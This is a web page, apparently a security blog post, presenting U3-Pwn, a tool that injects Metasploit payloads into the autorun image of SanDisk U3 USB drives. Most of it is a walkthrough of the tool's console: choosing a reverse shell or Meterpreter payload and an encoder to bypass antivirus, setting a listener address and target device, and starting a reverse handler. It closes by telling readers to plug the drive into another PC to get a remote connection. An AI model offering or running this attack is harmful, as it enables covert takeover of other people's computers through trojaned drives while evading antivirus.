U3-PWN

Description

U3-Pwn is a tool designed to automate injecting executables to Sandisk smart usb devices with default U3 software install. This is performed by removing the original iso file from the device and creating a new iso with autorun features.ite

Example

         ~    .__ °.__   0       o                    ^   .__ °__  `´        
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__.  
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  |  
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O|  
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____|  
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´  

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


   U3-Pwn Main Menu:

   1.  Generate & Replace Iso Image.
   2.  Generate & Replace With Custom Exe.
   3.  Mass U3 Pwnage - Multi device attack.
   4.  Find Out U3 SanDisk Device Information.
   5.  Replace Iso Image With Original U3 Iso.
   6.  About U3-Pwn & Disclaimer.
   7.  Exit U3-Pwn.

   Enter the number: 1


                                                                              
          ~    .__ °.__   0       o                    ^   .__ °__  `´        
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__.  
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  |  
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O|  
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____|  
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´  

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************

    What payload do you want to generate:

    Name:                                       Description:
    -----                                       ------------

    1) Windows Shell Reverse_TCP                Windows Command Shell, Reverse TCP Stager   
    2) Windows Reverse_TCP Meterpreter          Windows Meterpreter (Reflective Injection), Reverse TCP Stager
    3) Windows Reverse_TCP VNC DLL              VNC Server (Reflective Injection), Reverse TCP Stager
    4) Windows Bind Shell                       Windows Command Shell, Bind TCP Stager
    5) Windows Bind Shell X64                   Windows x64 Command Shell, Bind TCP Inline             
    6) Windows Shell Reverse_TCP X64            Windows x64 Command Shell, Windows x64 Reverse TCP Stager
    7) Windows Meterpreter Reverse_TCP X64      Windows x64 Meterpreter, Windows x64 Reverse TCP Stager      
    8) Windows Meterpreter Reverse HTTPS        Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager  
    9) Windows Meterpreter Reverse DNS          Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   10) ShellCodeExec Alphanum Shellcode         This will drop a meterpreter payload through shellcodeexec (A/V Safe)
      
   Enter number: 1


                                                                              
          ~    .__ °.__   0       o                    ^   .__ °__  `´        
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__.  
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  |  
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O|  
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____|  
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´  

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************

    What encoder would you like to try and bypass AV with.
    
    Name:                              Description:
    -----                              -----------
     
    1) avoid_utf8_tolower              Avoid UTF8/tolower               
    2) shikata_ga_nai                  Polymorphic XOR Additive Feedback Encoder 
    3) alpha_mixed                     Alpha2 Alphanumeric Mixedcase Encoder
    4) alpha_upper                     Alpha2 Alphanumeric Uppercase Encoder  
    5) call4_dword_xor                 Call+4 Dword XOR Encoder  
    6) countdown                       Single-byte XOR Countdown Encoder  
    7) fnstenv_mov                     Variable-length Fnstenv/mov Dword XOR Encoder  
    8) jmp_call_additive               Jump/Call XOR Additive Feedback Encoder  
    9) nonalpha                        Non-Alpha Encoder  
   10) nonupper                        Non-Upper Encoder  
   11) unicode_mixed                   Alpha2 Alphanumeric Unicode Mixedcase Encoder 
   12) unicode_upper                   Alpha2 Alphanumeric Unicode Uppercase Encoder                          
   13) No Encoding                     Standard Payload Generation  
   14) Multi-Encoder                   Multiple Iteration Encoding 

    
   Enter number: 2

   Enter Ip Address for reverse listener: 192.168.1.12

   Enter the port of the Listener: 5555

   Enter the device to change iso image on (example /dev/sde1): /dev/sdc


                                                                              
          ~    .__ °.__   0       o                    ^   .__ °__  `´        
   °____) __ __|  | | °|   ______°____ 0 ____  __ _________|__|/  |_ ___.__.  
   /    \|  | °\  |°|  | °/  ___// __ \_/ ___\|  | °\_  __ \ o\   __<   |  |  
  | o°|  \  |  /  |_|  |__\___ \  ___/\ °\___| o|  /|  | \/  ||  |° \___ O|  
  |___|  /____/|____/____/____ °>\___  >\___  >____/ |__|° |__||__|  / ____|  
  `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/  ``´```´```´´´´`´``0_o\/´´`´´  

   ************************************************************************
        U3-Pwn  Metasploit Payload Injection Tool For SanDisk Devices
   ************************************************************************


  Generating Shellcode Please Wait...
u3_partition_info() failed: Device reported command failed: status 1

   Do you want to start a listener to receive the payload yes or no: yes

   Starting Listener....
[*] Initializing modules...
PAYLOAD => windows/shell/reverse_tcp
LHOST => 192.168.1.12
LPORT => 5555
[*] Started reverse handler on 192.168.1.12:5555 
[*] Starting the payload handler...

After that use the device on other pc to get a reverse connection by just opening it. 

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?